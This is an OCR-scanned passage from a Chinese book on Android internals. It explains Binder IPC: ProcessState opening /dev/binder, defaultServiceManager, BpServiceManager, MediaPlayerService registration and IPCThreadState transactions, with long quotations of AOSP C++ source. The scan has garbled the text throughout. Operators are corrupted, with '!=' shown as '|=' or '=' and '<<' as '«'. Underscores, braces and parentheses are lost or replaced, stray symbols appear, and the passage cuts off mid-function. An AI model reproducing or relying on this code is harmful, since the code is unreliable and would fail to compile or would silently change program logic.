#if Idefined(HAVE. WIN32 IPC) 
// mmap the binder, providing a chunk of virtual address space to receive transactions 
mVMStart = mmap(0, BINDER. VM SIZE, PROT. READ, MAP. PRIVATE | MAP NORESERVE, mDriverFD, 0); 
if (mVMStart == MAP FAILED) { 


II sigh 
ALOGE("Using /dev/binder failed: unable to mmap transaction memory.\n"); 
close(mDriverFD); 
mbDriverFD = -1; 
) 
#else 
mDriverFD = -1; 
#endif 
) 


LOG ALWAYS FATAL IF(mDriverFD < 0, "Binder driver could not be opened. Terminating."); 
} 
在 上 述 代码 中 ，open_driver() 的 作用 是 打开 设备 /dewbinder, 这 是 Android 在 内 核 中 为 完成 进程 间 通 信和 而 
专门 设置 的 一 个 虚拟 设备 ， 具 体 实现 代码 如 下 所 示 。 
static int open_driver() 
{ 
int fd = open("/dev/binder", O_RDWR); 
if (fd >= 0) { 
fentl(fd, F_SETFD, FD_CLOEXEC); 
int vers; 
status_t result = ioctl(fd, BINDER_VERSION, &vers); 
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if (result == -1){ 
ALOGE("Binder ioctl to obtain version failed: %s", strerror(errno)); 
close(fd); 
fd = -1; 

} 


if (result != 0 || vers |= BINDER CURRENT. PROTOCOL VERSION) ( 
ALOGE("Binder driver protocol does not match user space protocoll"); 
close(fd); 
fd = -1; 
} 
size_t maxThreads = 15; 
result = ioctl(fd, BINDER SET MAX THREADS, &maxThreads); 
if (result == -1) { 
ALOGE ("Binder ioctl to set max threads failed: %s", strerror(errno)); 
Ü 
) else ( 
ALOGW("Opening '/dev/binder failed: %s\n", strerror(errno)); 
) 


return fd; 
) 
由 此 可 见 ， 函 数 Process::self0) 具 备 如 下 功能 。 
O 打开 /dewbinder 设 备 ， 这 就 相当 于 与 内 核 的 Binder 驱 动 有 了 交互 的 通道 。 
Па 对 返回 的 乌 使 用 mmap， 这 样 Binder 驱 动 就 会 分 配 一 块 内 存 来 接收 数据 。 
O 由 于 ProcessState 具 有 了 唯一 性 ， 因 此 一 个 进程 只 打开 设备 一 次 。 
O 分 析 完 ProcessState， 接 下 来 将 要 分 析 第 二 个 关键 函数 defaultServiceManager()。 


4.6.3 返回 IServiceManager 对 象 


函数 defaultServiceManager() 在 如 下 文件 中 实现 。 

\frameworks\native\libs\binder\IServiceManager.cpp 

函数 defaultServiceManager() 的 功能 是 返回 一 个 IServiceManager 对 象 ， 通 过 此 对 象 可 以 与 另 一 个 进程 
ServiceManager 进行 交互 ， 其 具体 实现 代码 如 下 所 示 。 

sp<IServiceManager> defaultServiceManager() 


{ 
if (gDefaultServiceManager != NULL) return gDefaultServiceManager; 
1 
AutoMutex l(gDefaultServiceManagerLock); 
if (gDefaultServiceManager == NULL) ( 
gDefaultServiceManager = interface cast«IServiceManager?( 
ProcessState::self()->getContextObject(NULL)); 
} 
} 
return gDefaultServiceManager; 
} 
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在 上 述 代码 中 ， 调 用 了 类 ProcessState 中 的 函数 getContextObject()。 注 意 传 给 它 的 参数 是 NULL， 即 0。 


Ti 


而 再 看 函数 getContextObjectD， 此 函数 在 文件 ProcessState.cpp 中 定义 ， 具 体 实 现代 码 如 下 所 示 。 


sp<IBinder> ProcessState::getContextObject(const String16& name, const sp<IBinder>& caller) 


{ 


) 


mLock.lock(); 
sp<lBinder> object( 

mContexts.indexOfKey(name) >= 0 ? mContexts.valueFor(name) : NULL); 
mLock.unlock(); 


IIprintf("Getting context object %s for %р\п", String8(name).string(), caller.get()); 
if (object != NULL) return object; 


11 Don't attempt to retrieve contexts if we manage them 
if (mManagesContexts) ( 
ALOGE("getContextObject(%s) failed, but we manage the contexts!\n", 
String8(name).string()); 
return NULL; 
} 


IPCThreadState* ipc = IPCThreadState::self(); 
{ 
Parcel data, reply; 
ll no interface token on this magic transaction 
data.writeString16(name); 
data.writeStrongBinder(caller); 
status_t result = ipc->transact(0 /*magic*/, 0, data, &reply, 0); 
if (result == NO_ERROR) { 
object = reply.readStrongBinder(); 
} 
} 


ipc->flushCommands(); 


if (object != NULL) setContextObject(object, name); 
return object; 


上 述 代 码 调 用 了 函数 getStrongProxyForHandle(), 其 调用 参数 名 为 handle。 函 数 getStrongProxyForHandle() 
在 文件 ProcessState.cpp 中 实现 ， 具 体 实现 代码 如 下 所 示 。 
5р<!Вїпдег> ProcessState::getStrongProxyForHandle(int32 t handle) 


( 


sp<lBinder> result; 
AutoMutex _I(mLock); 
handle_entry* e = lookupHandleLocked(handle); 
if (e != NULL) ( 
11 We need to create a new BpBinder if there isn't currently one, OR we 
ll are unable to acquire a weak reference on this current one. See comment 
ll in getWeakProxyForHandle() for more info about this. 
IBinder* b = e->binder; 
if (b == NULL || !e->refs->attemptincWeak(this)) { 
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b = new BpBinder(handle); 
e->binder = b; 
if (b) e->refs = b->getWeakRefs(); 
result = b; 

) else { 
II This little bit of nastyness is to allow us to add a primary 
II reference to the remote proxy when this team doesn't have one 
// but another team is sending the handle to us. 
result.force set(b); 
e->refs->decWeak(this); 

} 


return result; 
} 
BpBinder 和 BBinder 都 是 Android 中 与 Binder 通信 相关 的 代表 ， 它 们 都 是 从 IBinder 类 中 派生 而 来 。 


BpBinder 是 客户 端 用 来 与 Server 交互 的 代理 类 ，p 即 Proxy. 


BBinder 则 是 与 proxy 相对 的 一 端 ， 它 是 proxy 交互 的 目的 端 。 如 果 说 Proxy 代表 客户 端 ， 那 么 BBinder 


则 代表 服务 端 。 这 里 的 BpBinder 和 BBinder 是 一 一 对 应 的 ， 即 某 个 BpBinder 只 能 和 对 应 的 BBinder 交互 。 


用 户 


当然 不 希望 通过 BpBinderA 发 送 的 请 求 ， 却 由 BBinderB 来 处 理 。 
在 函数 defaultServiceManager() 中 创建 了 BpBinder， 给 BpBinder 构造 函数 传递 的 参数 handle 的 值 是 0, 


0 代表 了 ServiceManager 所 对 应 的 BBinder。BpBinder 在 如 下 文件 中 实现 。 


说 ， 
义 ， 


\frameworks\native\libs\binder\BpBinder.cpp 
BpBinder 的 具体 实现 代码 如 下 所 示 。 
BpBinder::BpBinder(int32 t handle) 

: mHandle(handle) 

, mAlive(1) 

, mObitsSent(0) 

, mObituaries(NULL) 


ALOGV("Creating BpBinder %p handle %d\n", this, mHandle); 


extendObjectLifetime(OBJECT LIFETIME WEAK); 
IPCThreadState::self()-»incWeakHandle(handle); 


} 

通过 上 述 代码 可 知 ，BpBinder、BBinder 这 两 个 类 没有 操作 ProcessState 打开 的 /dewbinder 设备 。 也 就 是 
这 两 个 Binder 类 没有 和 binder 设备 直接 交互 。 先 看 interface cast 的 具体 实现 ， 在 文件 Interface.h 中 定 
其 代码 如 下 所 示 。 

template<typename INTERFACE» 

inline sp<INTERFACE> interface cast(const sp<IBinder>& obj) 


return INTERFACE::asInterface(obj); 
} 
由 此 可 见 ，interface_cast 仅仅 是 一 个 模板 函数 ， 所 以 interface cast<IServiceManager>() 等 价 于 下 面 的 代码 。 
inline sp<IServiceManager> interface cast(const sp<IBinder>& obj) 


return IServiceManager::aslInterface(obj); 
} 
这 样 又 转移 到 IServiceManager 对 象 中 去 了 。 
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COD 定义 业务 逻辑 
IServiceManager 定义 了 ServiceManager 所 提供 的 服务 ， 在 如 下 所 示 的 文件 中 定义 。 
\rameworks\vnative\include\bindenlServiceManager.h 
IServiceManager 的 主要 实现 代码 如 下 所 示 。 
class IServiceManager : public IInterface 
E 
DECLARE META INTERFACE(ServiceManager); 


p 
* Retrieve an existing service, blocking for a few seconds 
* if it doesn't yet exist 
vl 

virtual sp<IBinder> getService( const String16& name) const = 0; 


p 
* Retrieve an existing service, non-blocking 
yl 

virtual sp<IBinder>checkService( const String16& name) const = 0; 


p 
* Register a service 
xi) 
virtual status taddService( const String16& name, 
const sp<|Binder>& service, 
bool allowlsolated = false) = 0; 


p 
* Return list of all existing services 
А 

virtual Vector<String16> listServices() = 0; 


enum ( 
GET SERVICE TRANSACTION = IBinder::FIRST CALL. TRANSACTION, 
CHECK SERVICE TRANSACTION, 
ADD SERVICE TRANSACTION, 
LIST SERVICES TRANSACTION, 
k 
X 


sp<lServiceManager> defaultServiceManager(); 


template<typename INTERFACE» 
status t getService(const String16& name, sp<INTERFACE>* outService) 
{ 
const sp<IServiceManager> sm = defaultServiceManager(); 
if (sm != NULL) { 
*outService = interface_cast<INTERFACE>(sm->getService(name)); 
if ((‘outService) != NULL) retum NO ERROR; 
} 
return NAME_NOT_FOUND; 


@ 


$48 Android aspan — 


} 


bool checkCallingPermission(const String16& permission); 
bool checkCallingPermission(const String16& permission, 
int32_t* outPid, int32_t* outUid); 
bool checkPermission(const String16& permission, pid_t pid, uid_t uid); 


class BnServiceManager : public Bninterface<IServiceManager> 


d 
public: 
virtual status t onTransact( uint32 t code, 
const Parcel& data, 
Parcel* reply, 
uint32 tflags = 0); 
k 


ү // namespace android 


#endif // ANDROID ISERVICE MANAGER H 
由 此 可 见 ，Android 通过 DECLARE META INTERFACE 和 IMPLENT 7:, 将 业务 和 通信 
(2) 业务 与 通信 的 挂 钧 
DECLARE META INTERFACE 和 IMPLEMENT META INTERFACE 这 两 个 宏 都 定义 在 刚才 的 
IInterface.h 中 。 先 看 DECLARE META INTERFACE 这 个 宏 ， 具 体 代码 如 下 所 示 。 
#define DECLARE_META_INTERFACE(INTERFACE) 
static const android::String16 descriptor; 
static android::sp<I##INTERFACE> asinterface( 
const android::sp<android::IBinder>& obj); 
virtual const android::String16& getlnterfaceDescriptor() const; 
WHANTERFACE(; 
virtual ~I##INTERFACE(); 
将 IServiceManager 的 DELCARE 宏 进行 相应 的 替换 后 ， 得 到 如 下 所 示 的 代码 。 
/定义 一 个 描述 字符 串 


static const android::String16 descriptor; 


让 地 联系 在 


=== == = 


/定义 一 个 aslnterface() 函 数 
static android::sp< IServiceManager > 
aslnterface(const android::sp<android::IBinder>& obj) 


/定义 一 个 getlnterfaceDescriptor() 函 数 ， 估 计 就 是 返回 descriptor FFB 
virtual const android::String16& getlnterfaceDescriptor() const; 


/定义 IServiceManager 的 构造 函数 和 析 构 函数 
IServiceManager (); 
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virtual -IServiceManager(); 

宏 DECLARE 声明 了 一 些 函 数 和 一 个 变量 ， 宏 IMPLEMENT 的 作用 就 是 定义 DECLARE 声明 的 函数 和 
变量 了 。IMPLEMENT 的 定义 在 文件 IInterface.h 中 ，IServiceManager 是 如 何 使 用 这 个 宏 的 呢 ? 只 有 一 行 代 
码 ， 在 IServiceManager.cpp 中 ， 上 有 具体 代码 如 下 所 示 。 

IMPLEMENT_META_INTERFACE(ServiceManager,"android.os.IServiceManager"); 

可 以 直接 将 IServiceManager 中 IMPLEMENT 宏 的 定义 展开 ， 具 体 代码 如 下 所 示 。 

const android::String16 

IServiceManager::descriptor("android.os.IServiceManager"); 

/实现 getInterfaceDescriptor()E& St 

const android::String16& IServiceManager::getlnterfaceDescriptor() const 


// 返 回 字符 串 descriptor, {4 android.os.IServiceManager 
return IServiceManager::descriptor; 


) 

/实现 aslnterface() 函 数 
android::sp<IServiceManager> 
IServiceManager::aslnterface(const android:: 

sp<android::IBinder>& obj) 

{ 

android::sp<lServiceManager> intr; 
if (obj != NULL) { 
intr = static_cast<IServiceManager *>( 
obj->queryLocallnterface 
(IServiceManager::descriptor).get()); 
if (intr == NULL) ( 
/lobj 是 刚才 创建 的 BpBinder(0) 
intr = new BpServiceManager(obj); 
} 
} 


return intr; 


ананна 

IServiceManager::IServiceManager () { } 

IServiceManager::- ІЅегуісеМападег() ( } 

interface cast 是 如 何 把 BpBinder 指针 转换 成 一 个 IServiceManager 指针 的 呢 ? 其 实 是 通过 aslnterface() 
函数 的 如 下 代码 实现 的 。 

intr = new BpServiceManager(obj); 

由 此 可 见 ，interface_cast 不 是 指针 的 转换 ， 而 是 利用 BpBinder 对 象 作为 参数 新 建 了 一 个 BpService Manager 
对 象 。 我 们 已 经 知道 BpBinder 和 BBinder 与 通信 有 关系 ， 这 里 怎么 突然 出 现 一 个 BpServiceManager? 它们 
之 间 又 有 什么 关系 呢 ? 要 搞 清 这 个 问题 ， 必 须 先 了 解 IServiceManager 家 族 之 间 的 关系 ,具体 说 明 如 下 所 示 。 

О IServiceManager、BpServiceManager 和 BnServiceManager 都 与 业务 逻辑 相关 。 

口 BnServiceManager 同 时 从 IServiceManager BBinder 派 生 ， 表 示 可 以 直接 参与 Binder 通 信 。 

口 BpServiceManager 虽 然 从 BplInterface 中 派生 ， 但 是 这 条 分 支 似乎 与 BpBinder 没 有 关系 。 

口 BnServiceManager 是 一 个 虑 类， 其 业务 函数 最 终 需 要 子 类 来 实现 。 

以 上 这 些 关系 很 复杂 ， 但 ServiceManager 并 没有 使 用 错综复杂 的 派生 关系 ， 它 直接 打开 Binder 设备 并 
与 之 交互 。 BpServiceManager 不 像 BnServiceManager 那样 与 Binder 有 直接 的 关系 ,那么 它 又 是 如 何 与 Binder 
交互 的 呢 ? 简 言 之 ，BpRefBase 中 mRemote 值 就 是 BpBinder。 请 看 BpServiceManager 左边 派生 分 支 树 上 的 
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-系列 代码 ， 它 们 都 在 文件 IServiceManager.cpp 中 实现 ， 具 体 代 码 如 下 所 示 。 
public: 
BpServiceManager(const sp<IBinder>& impl) 
: BpInterface<IServiceManager>(impl) 


{ 
} 
virtual sp<IBinder> getService(const String16& name) const 
{ 
unsigned n; 
for (n = 0; n < 5; n++){ 
sp«IBinder» svc = checkService(name); 
if (svc != NULL) return svc; 
ALOGI("Waiting for service %s...\n", String8(name).string()); 
sleep(1); 
} 
return NULL; 
} 
virtual sp«IBinder» checkService( const String16& name) const 
{ 
Parcel data, reply; 
data.writeInterfaceToken(IServiceManager: :getInterfaceDescriptor()); 
data.writeString16(name); 
remote()->transact(CHECK_SERVICE_TRANSACTION, data, &reply); 
return reply.readStrongBinder(); 
) 


virtual status t addService(const String16& name, const sp<IBinder>& service, 
bool allowlsolated) 

{ 
Parcel data, reply; 
data.writelnterfaceToken(IServiceManager::getlnterfaceDescriptor()); 
data.writeString16(name); 
data.writeStrongBinder(service); 
data.writelnt32(allowlsolated ? 1 : 0); 
status terr = remote()-*transactADD SERVICE TRANSACTION, data, &reply); 
return err == NO ERROR ? reply.readExceptionCode() : err; 

} 


virtual Vector<String16> listServices() 
{ 

Vector<String16> res; 

intn = 0; 


for (;;) ( 
Parcel data, reply; 
data.writelnterfaceToken(IServiceManager::getlnterfaceDescriptor()); 
data.writelnt32(n++); 
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status terr = remote()->transact(LIST_ SERVICES TRANSACTION, data, &reply); 
if (err l= NO ERROR) 


break; 
res.add(reply.readString16()); 
} 
return res; 


} 
BpInterface 在 文件 IInterface.h 中 定义 ， 具 体 的 实现 代码 如 下 所 示 。 
template<typename INTERFACE> 
class Bplnterface : public INTERFACE, public BpRefBase 
{ 
public: 
Bplnterface(const sp<IBinder>& remote); 


protected: 
virtual IBinder* onAsBinder(); 
X 
BpRefBase 在 文件 \frameworks\native\libs\binden\Binder.cpp 中 定义 ， 有 具体 实现 代码 如 下 所 示 。 
BpRefBase::BpRefBase(const sp<IBinder>& o) 
: mRemote(o.get()), mRefs(NULL), mState(0) 


{ 
extendObjectLifetime(OBJECT LIFETIME WEAK); 
if (mRemote) { 
mRemote->incStrong(this); // Removed on first IncStrong() 
mRefs = mRemote->createWeak(this); 11 Held for our entire lifetime 
} 
} 
BpRefBase::~BpRefBase() 
{ 
if (mRemote) { 
if ((mState&kRemoteAcquired)) { 
mRemote->decStrong(this); 
} 
mRefs->decWeak(this); 
} 
} 


由 此 可 见 ， 是 BpServiceManager 的 一 个 变量 mRemote 指向 了 BpBinder。 在 函数 defaultServiceManager 
中 有 以 下 两 个 关键 对 象 。 

O BpBinder 对 象 ， 其 handle 值 是 0。 

0 BpServiceManager 对 象 ， 其 mRemote 值 是 BpBinder。 

BpServiceManager 对 象 实现 了 IServiceManager 的 业务 函数 ， 现 在 又 有 BpBinder 作为 通信 的 代表 , 接 下 来 的 
工作 就 简单 了 。 下 面 要 通过 分 析 MediaPlayerService 的 注册 过 程 ， 进 一 步 分 析 业 务 函 数 的 内 部 是 如 何 工作 的 。 


4.6.4 注册 MediaPlayerService 
再 回 到 MediaServer 的 main() 函 数 ,下 一 个 要 分 析 的 是 MediaPlayerService, 此 函数 在 如 下 所 示 的 文件 中 
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实现 。 
\frameworks\av\media\libmediaplayerservice\MediaPlayerService.cpp 
MediaPlayerService 的 具体 实现 代码 如 下 所 示 。 
void MediaPlayerService::instantiate(){ 
defaultServiceManager()->addService( 
String16("media.player"), new MediaPlayerService()); 


} 

根据 前 面 的 分 析 可 知 , defaultServiceManager0 实 际 返回 的 对 象 是 BpServiceManager, 它 是 IService Manager 
的 后 代 。 函 数 addService0 在 文件 IServiceManager.cpp 中 实现 ， 有 具体 实现 代码 如 下 所 示 。 

virtual status t addService(const String16& name, const sp<IBinder>& service, 

bool allowlsolated) 

{ 

Parcel data, reply; 
data.writelnterfaceToken(IServiceManager::getlnterfaceDescriptor()); 
data.writeString16(name); 

data.writeStrongBinder(service); 

data.writelnt32(allowlsolated ? 1 : 0); 

status terr = remote()->transact(ADD_ SERVICE TRANSACTION, data, &reply); 
return err == NO_ERROR ? reply.readExceptionCode() : err; 

) 

接 下 来 分 析 BpBinder 的 transact() 函 数 。 前 面 说 过 ， 在 BpBinder 中 确实 找 不 到 任何 与 Binder 设备 交互 
的 地 方 。 那 它 是 如 何 参与 通信 的 呢 ? 原来 ， 秘 密 就 在 这 个 transact0 函 数 中 ， 此 函数 在 文件 BpBinder.cpp 中 
实现 ， 其 实现 代码 如 下 所 示 。 

status t BpBinder::transact(uint32 t code, const 

Parcel& data, Parcel* reply, 

uint32 t flags) 
{ 
if (mAlive) { 
//BpBinder 把 transact 工作 交 给 了 IPCThreadState 
status_t status = IPCThreadState::self()->transact( 
mHandle, code, data, reply, 

flags);//mHandle 也 是 参数 

if (status == DEAD_OBJECT) mAlive = 0; 

return status; 


} 


retum DEAD OBJECT; 
} 
IPCThreadState 是 进程 中 真正 干 活 的 伙计 执行 操作 的 ， 在 如 下 所 示 的 文件 中 实现 。 
\frameworks\native\libs\binder\IPCThreadState.cpp 
IPCThreadState 的 具体 实现 代码 如 下 所 示 。 
IPCThreadState* IPCThreadState::self() 
1 
if (gHaveTLS) ( 
restart: 
const pthread key tk = gTLS; 
IPCThreadState* st = (IPCThreadState*)pthread getspecific(k); 
if (st) return st; 
return new IPCThreadState; 
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} 
if (gShutdown) return NULL; 


pthread_mutex_lock(&gTLSMutex); 
if (IgHaveTLS) { 
if(pthread key create(&gTLS, threadDestructor) != 0) { 
pthread_mutex_unlock(&gTLSMutex); 
retum NULL; 
} 
gHaveTLS = true; 
} 
pthread_mutex_unlock(&gTLSMutex); 
goto restart; 


} 
接 下 来 分 析 其 构造 函数 PCThreadState()， 此 函数 也 在 文件 IPCThreadState.cpp 中 实现 , 具体 实现 代码 如 
下 所 示 。 
IPCThreadState::IPCThreadState() 
: mProcess(ProcessState::self()), 

mMyThreadld(androidGetTid()), 

mStrictModePolicy(0), 

mLastTransactionBinderFlags(0) 


{ 
pthread_setspecific(gTLS, this); 
clearCaller(); 
mlin.setDataCapacity(256); 
mOut.setDataCapacity(256); 

} 

IPCThreadState::-IPCThreadState() 

{ 

} 


由 此 可 见 ， 每 个 线程 都 有 一 个 IPCThreadState， 每 个 IPCThreadState 中 都 有 一 个 mIn 和 一 个 mOut, Ж 
P, mln 是 用 来 接收 来 自 Binder 设备 的 数据 的 ， 而 mOut 则 是 用 来 存储 发 往 Binder 设备 的 数据 的 。 
传输 工作 是 很 复杂 的 ，BpBinder 的 transact 调用 了 IPCThreadState 的 transact() 函 数 ， 这 个 函数 实际 完成 
了 与 Binder 通信 的 工作 。 函 数 transact0 在 文件 IPCThreadState.cpp 中 实现 ， 主 要 实现 代码 如 下 所 示 。 
status t IPCThreadState::transact(int32 t handle, 
uint32 t code, const Parcel& data, 
Parcel* reply, uint32 t flags) 


status terr = data.errorCheck(); 
flags |= TF ACCEPT FDS; 


IF LOG TRANSACTIONS) { 
TextOutput::Bundle b(alog); 
alog << "BC TRANSACTION thr " << (void*)pthread self() << " / hand" 
<< handle << " / code " << TypeCode(code) << ": " 
«« indent «« data «« dedent «« endl; 
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} 


if (err == NO ERROR)( 
LOG ONEWAY('»»»» SEND from pid %d uid %d 96s", getpid(), getuid(), 
(flags & TF ONE WAY) == 0 ? "READ REPLY" : "ONE WAY"); 
err = writeTransactionData(BC TRANSACTION, flags, handle, code, data, NULL); 
} 


if (err = NO_ERROR) { 
if (reply) reply->setError(err); 
return (mLastError = err); 


} 


if ((flags & TF_ONE_WAY) == 0) { 
#if 0 
if (code == 4) ( // relayout 
ALOGI(">>>>>> CALLING transaction 4"); 
) else { 
ALOGI(">>>>>> CALLING transaction %d", code); 
H 
#endif 
if (reply) ( 
err = waitForResponse(reply); 
) else { 
Parcel fakeReply; 
err = waitForResponse(&fakeReply); 
} 
#if 0 
if (code == 4) ( // relayout 
ALOGI("<<<<<< RETURNING transaction 4"); 
) else ( 
ALOGI("<<<<<< RETURNING transaction %d", code); 


) 
#endif 


IF_LOG_TRANSACTIONS() ( 
TextOutput::Bundle _b(alog); 
alog << "BR_REPLY thr " << (void*)pthread_self() << " / hand " 
<< handle << ": "; 
if (reply) alog << indent << *reply << dedent << endl; 
else alog << "(none requested)" << endl; 
} 
) else ( 
err = waitForResponse(NULL, NULL); 
) 


return err; 
) 
接 下 来 看 函数 writeTransactionData()， 此 函数 在 文件 IPCThreadState.cpp 中 定义 ， 具 体 实现 代码 如 下 所 示 。 
status t IPCThreadState::writeTransactionData(int32 t cmd, uint32 t binderFlags, 
int32 t handle, uint32 t code, const Parcel& data, status t* statusBuffer) 
9 


10 Android Gt € fo 5 RRR 


binder transaction data tr; 


tr.target.handle = handle; 
tr.code = code; 

tr.flags = binderFlags; 
tr.cookie = 0; 

tr.sender pid = 0; 
tr.sender euid = 0; 


const status t err = data.errorCheck(); 
if (err == NO ERROR)( 
tr.data size = data.ipcDataSize(); 
tr.data.ptr.buffer = data.ipcData(); 
tr.offsets size = data.ipcObjectsCount()'sizeof(size t); 
tr.data.ptr.offsets = data.ipcObjects(); 
) else if (statusBuffer) ( 
tr.flags |= TF STATUS CODE; 
*statusBuffer = err; 
tr.data size = sizeof(status t); 
tr.data.ptr.buffer = statusBuffer; 
tr.offsets size = 0; 
tr.data.ptr.offsets = NULL; 
) else ( 
return (mLastError = err); 


) 


mOut.writeInt32 (cmd); 
mOut.write(&tr, sizeof(tr)); 


return NO ERROR; 
) 
由 此 可 见 ， 此 函数 的 功能 是 把 命令 写 到 mOut 中 ， 而 不 是 直接 发 出 去 。 
现在 ， 已 经 把 addService 的 请 求 信息 写 到 mOut 中 了 。 接 下 来 再 看 发 送 请 求 和 接收 回复 部 分 的 实现 ， 实 
现 函 数 waitForResponse() 在 文件 IPCThreadState.cpp 中 定义 ， 具 体 实现 代码 如 下 所 示 。 
status t IPCThreadState::waitForResponse(Parcel *reply, status_t *acquireResult) 


T 
int32 t cmd; 
int32 t err; 


while (1) { 
if ((err=talkWithDriver()) < NO ERROR) break; 
err = min.errorCheck(); 
if (err < NO ERROR) break; 
if (mIn.dataAvail() == 0) continue; 


cmd = min.readint32(); 


IF LOG COMMANDS() { 
alog «« "Processing waitForResponse Command: " 
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<< getReturnString(cmd) << endl; 
} 


switch (cmd) { 

case BR_TRANSACTION_COMPLETE: 
if (reply && !acquireResult) goto finish; 
break; 


case BR DEAD REPLY: 
em - DEAD OBJECT; 
goto finish; 


case BR FAILED REPLY: 
er = FAILED TRANSACTION; 
goto finish; 


case BR ACQUIRE RESULT: 


{ 
ALOG ASSERT(acquireResult != NULL, "Unexpected brACQUIRE RESULT"); 
const int32 t result = min.readint32(); 
if (lacquireResult) continue; 
*acquireResult = result? МО ERROR : INVALID OPERATION; 
} 
goto finish; 


сазе BR_REPLY: 
{ 
binder_transaction_data tr; 
err = min.read(&tr, sizeof(tr)); 
ALOG_ASSERT(err == NO ERROR, "Not enough command data for brREPLY"); 
if (err != NO ERROR) goto finish; 


if (reply) ( 
if ((tr.flags & TF STATUS CODE) == 0) { 
reply->ipcSetDataReference( 
reinterpret_cast<const uint8_t*>(tr.data.ptr.buffer), 
tr.data_size, 
reinterpret_cast<const size_t*>(tr.data.ptr.offsets), 
tr.offsets_size/sizeof(size_t), 
freeBuffer, this); 
) else ( 
err = *static_cast<const status_t*>(tr.data.ptr.buffer); 
freeBuffer(NULL, 
reinterpret_cast<const uint8_t*>(tr.data.ptr.buffer), 
tr.data_size, 
reinterpret_cast<const size_t*>(tr.data.ptr.offsets), 
tr.offsets size/sizeof(size t), this); 
} 
) else ( 
freeBuffer(NULL, 


reinterpret_cast<const uint8_t*>(tr.data.ptr.buffer), 
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tr.data_size, 
reinterpret_cast<const size_t*>(tr.data.ptr.offsets), 
tr.offsets_size/sizeof(size_t), this); 


continue; 
} 
} 
goto finish; 
default: 


err = executeCommand(cmd); 
if (err != МО ERROR) goto finish; 
break; 


} 


finish: 
if (err = NO_ERROR) { 
if (acquireResult) *acquireResult = err; 
if (reply) reply->setError(err); 
mLastError = err; 


} 


return err; 
} 
这 样 便 发 送 了 请 求 数据 ， 假 设 马 上 就 收 到 了 回复 。 再 看 函数 executeCommand(), ， 此 函数 在 文件 
IPCThreadState.cpp 中 定义 ， 具 体 实现 代码 如 下 所 示 。 
status t IPCThreadState::executeCommand(int32 t cmd) 
{ 
BBinder* obj; 
RefBase::weakref type* refs; 
status_t result = NO ERROR; 


switch (cmd) { 

case BR_ERROR: 
result = mln.readlnt32(); 
break; 


case BR_OK: 
break; 


case BR_ACQUIRE: 
refs = (RefBase::weakref type*)mln.readlnt32(); 
obj = (BBinder*)mln.readInt32(); 
ALOG_ASSERT(refs->refBase() == obj, 
"BR_ACQUIRE: object %p does not match cookie %p (expected %p)", 
refs, obj, refs->refBase()); 
obj->incStrong(mProcess.get()); 
IF_LOG_REMOTEREFS() { 
LOG_REMOTEREFS("BR_ACQUIRE from driver on %p", obj); 
obj->printRefs(); 
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} 
mOut.writelnt32(BC ACQUIRE DONE); 
mOut.writeInt32((int32 t)refs); 
mOut.writeInt32((int32 t)obj); 

break; 


case BR RELEASE: 
refs = (RefBase::weakref type*)mln.readlInt32(); 
obj = (BBinder*)mlIn.readlnt32(); 
ALOG_ASSERT(refs->refBase() == obj, 
"BR RELEASE: object %p does not match cookie %p (expected %p)", 
refs, obj, refs-»refBase()); 
IF LOG REMOTEREFSY|) { 
LOG REMOTEREFS('BR RELEASE from driver on %p", obj); 
obj->printRefs(); 
} 
mPendingStrongDerefs.push(obj); 
break; 


case BR_INCREFS: 
refs = (RefBase::weakref type*)mln.readlnt32(); 
obj = (BBinder*)mIn.readInt32(); 
refs->incWeak(mProcess.get()); 
mOut.writelnt32(BC INCREFS DONE); 
moOut.writeInt32((int32 t)refs); 
moOut.writeInt32((int32 t)obj); 
break; 


case BR DECREFS: 
refs = (RefBase::weakref type*)mln.readlnt32(); 
obj = (BBinder*)mlIn.readint32(); 
I| NOTE: This assertion is not valid, because the object may no 
II longer exist (thus the (BBinder*)cast above resulting in a different 
// memory address) 
/IALOG_ASSERT (refs->refBase() == obj, 


II "BR_DECREFS: object %p does not match cookie %p (expected %p)", 
I refs, obj, refs->refBase()); 

mPendingWeakDerefs.push(refs); 

break; 


case BR_ATTEMPT_ACQUIRE: 
refs = (RefBase::weakref_type*)mln.readInt32(); 
obj = (BBinder*)mln.readInt32(); 


{ 
const bool success = refs->attemptlncStrong(mProcess.get()); 
ALOG ASSERT(success && refs->refBase() == obj, 
"BR ATTEMPT ACQUIRE: object %p does not match cookie %p (expected %p)" 
refs, obj, refs->refBase()); 


mOut.writelnt32(BC. ACQUIRE RESULT); 
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mOut.writelnt32((int32 t)success); 
} 


break; 


case BR_TRANSACTION: 
{ 
binder_transaction_data tr; 
result = min.read(&tr, sizeof(tr)); 
ALOG_ASSERT(result == NO_ERROR, 
"Not enough command data for brTRANSACTION"); 
if (result = МО ERROR) break; 


Parcel buffer; 

buffer.ipcSetDataReference( 
reinterpret cast«const uint8 t*»(tr.data.ptr.buffer), 
tr.data size, 
reinterpret cast«const size t*»(tr.data.ptr.offsets), 
tr.offsets size/sizeof(size t), freeBuffer, this); 


const pid t origPid = mCallingPid; 
const uid t origUid = mCallingUid; 


mCallingPid = tr.sender pid; 
mCallingUid = tr.sender euid; 


int curPrio = getpriority(PRIO PROCESS, mMyThreadld); 
if (gDisableBackgroundScheduling) ( 
if (curPrio » ANDROID PRIORITY NORMAL) ( 
II We have inherited a reduced priority from the caller, but do not 
// want to run in that state in this process. The driver set our 
II priority already (though not our scheduling class), so bounce 
11 it back to the default before invoking the transaction 
setpriority(PRIO PROCESS, mMyThreadld, ANDROID PRIORITY NORMAL); 
} 
) else { 
if (curPrio >= ANDROID_PRIORITY_BACKGROUND) ( 
11 We want to use the inherited priority from the caller. 
// Ensure this thread is in the background scheduling class, 
ll since the driver won't modify scheduling classes for us. 
11 The scheduling group is reset to default by the caller 
11 once this method returns after the transaction is complete 
set sched policy(mMyThreadld, SP BACKGROUND); 


} 

HALOG\(">>>> TRANSACT from pid %d uid %d\n", mCallingPid, mCallingUid); 
Parcel reply; 

IF_LOG_TRANSACTIONS() { 


TextOutput::Bundle b(alog); 
alog << "BR_TRANSACTION thr " << (void*)pthread_self() 
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<<" [ obj" << tr.target.ptr << " / code" 

<< TypeCode(tr.code) << ": " << indent << buffer 

<< dedent << endl 

<< "Data addr =" 

<< reinterpret cast«const uint8_t*>(tr.data.ptr. buffer) 

<<", offsets addr=" 

<< reinterpret cast«const size_t*>(tr.data.ptr.offsets) << endl; 


} 
if (tr.target.ptr) { 
sp<BBinder> b((BBinder*)tr.cookie); 
const status t error = b->transact(tr.code, buffer, &reply, tr.flags); 
if (error « NO ERROR) reply.setError(error); 
}else{ 
